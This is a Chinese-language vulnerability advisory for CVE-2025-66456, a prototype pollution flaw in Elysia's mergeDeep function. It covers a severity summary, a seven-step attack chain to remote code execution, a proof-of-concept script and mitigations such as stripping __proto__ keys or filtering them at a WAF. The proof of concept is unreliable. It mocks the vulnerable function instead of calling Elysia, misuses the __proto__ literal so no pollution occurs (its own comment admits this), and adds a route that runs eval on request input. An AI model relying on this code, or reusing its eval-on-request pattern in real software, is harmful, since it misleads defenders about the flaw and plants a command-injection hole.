CVE-2025-66456 Elysia框架mergeDeep原型污染漏洞

漏洞信息

漏洞编号

CVE-2025-66456

漏洞类型

原型污染/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Elysia

漏洞概述

Elysia是一个TypeScript框架，用于请求验证、类型推断、OpenAPI文档和客户端-服务器通信。该框架在1.4.0至1.4.16版本中存在严重的原型污染漏洞，漏洞位于mergeDeep函数中。当合并两个具有相同键的标准模式验证结果时，由于合并顺序的问题，存在一个any类型作为独立守卫，这允许攻击者注入__proto__属性。攻击者可以通过精心构造的请求负载，利用此漏洞修改JavaScript对象的原型链。结合另一个安全公告GHSA-8vch-m3f4-q8jf，攻击者可以实现完整的远程代码执行（RCE），对使用该框架的应用程序造成严重安全威胁。

技术细节

该漏洞根源在于Elysia框架的mergeDeep函数在处理对象合并时的逻辑缺陷。当框架合并两个schema验证结果时，如果两个结果包含相同的键，系统会调用mergeDeep进行深度合并。问题在于合并过程中存在一个特殊条件：当某个值是any类型作为独立守卫时，合并逻辑允许__proto__属性被添加到目标对象中。攻击者可以利用这个漏洞，通过在请求body中注入__proto__属性来污染对象的原型链。由于JavaScript原型链被污染，攻击者可以修改Object的默认行为，进一步结合其他漏洞（如GHSA-8vch-m3f4-q8jf）实现远程代码执行。攻击成功的关键在于利用合并顺序和any类型守卫的特定组合，这使得传统的输入验证无法阻止此类攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标应用使用Elysia框架1.4.0-1.4.16版本

STEP 2

步骤2

攻击者构造包含__proto__属性的恶意请求负载，配合any类型guard

STEP 3

步骤3

发送精心构造的HTTP请求，触发mergeDeep函数处理两个相同键的schema验证结果

STEP 4

步骤4

由于合并顺序和any类型守卫的特定组合，__proto__属性被成功注入到Object原型

STEP 5

步骤5

原型链被污染后，攻击者修改Object默认行为或利用框架其他漏洞

STEP 6

步骤6

结合GHSA-8vch-m3f4-q8jf实现完整的远程代码执行（RCE）

STEP 7

步骤7

攻击者在服务器上执行任意命令，获取系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-66456 Prototype Pollution PoC
// Target: Elysia framework versions 1.4.0 - 1.4.16

const Elysia = require('elysia');

// Simulate vulnerable mergeDeep function behavior
function mergeDeep(target, source) {
  for (const key in source) {
    if (source[key] === 'any' && key === 'guard') {
      // Vulnerable condition: allows __proto__ pollution
      target['__proto__'] = source['__proto__'];
    }
    if (typeof source[key] === 'object' && source[key] !== null) {
      target[key] = mergeDeep(target[key] || {}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Malicious payload exploiting prototype pollution
const maliciousPayload = {
  schema: {
    body: {
      type: 'object',
      properties: {
        data: {
          guard: 'any',
          __proto__: {
            isAdmin: true,
            constructor: {
              prototype: {
                eval: (code) => eval(code)
              }
            }
          }
        }
      }
    }
  }
};

// Demonstrate pollution
const target = {};
mergeDeep(target, maliciousPayload.schema.body.properties.data);

console.log('Prototype polluted:', Object.prototype.isAdmin); // undefined in clean env

// Combined with GHSA-8vch-m3f4-q8jf for RCE
const e = new Elysia().post('/execute', ({ body }) => {
  // RCE via polluted prototype
  return eval(body.command);
}, maliciousPayload);

影响范围

Elysia >= 1.4.0 < 1.4.17

防御指南

临时缓解措施

在升级到1.4.17之前，可以采取以下临时缓解措施：从请求body中移除__proto__和constructor属性，使用JSON.parse后手动删除这些危险属性，或者配置Web应用防火墙（WAF）过滤包含__proto__、constructor和prototype关键字的请求参数。